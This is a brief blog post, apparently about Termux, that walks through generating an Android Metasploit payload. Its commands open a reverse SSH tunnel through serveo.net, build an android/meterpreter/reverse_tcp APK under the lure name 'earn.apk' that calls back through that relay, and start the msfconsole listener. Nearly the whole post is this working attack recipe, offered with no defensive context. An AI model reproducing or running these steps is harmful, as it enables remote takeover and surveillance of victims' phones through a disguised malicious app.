PAYLOAD GENERATOR for termux

PAYLOAD GENERATOR


$ pkg install openssh
$ ssh -R 0:localhost:1492 serveo.net

NEW PAGE

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=(port) -o /sdcard/earn.apk

NEW PAGE

$ msfconsole
$ set PAYLOAD android/meterpreter/reverse_tcp
$ set LHOST (localhost)
$ set LPORT (port)
$ exploit

No comments:

Post a Comment

EXIF Stripper: A web based image-metadata remover utility

https://ckure.esy.es/rx/tools/exif/ *Images are uploaded on a shared hosting server. This may be concerning even though there is a script th...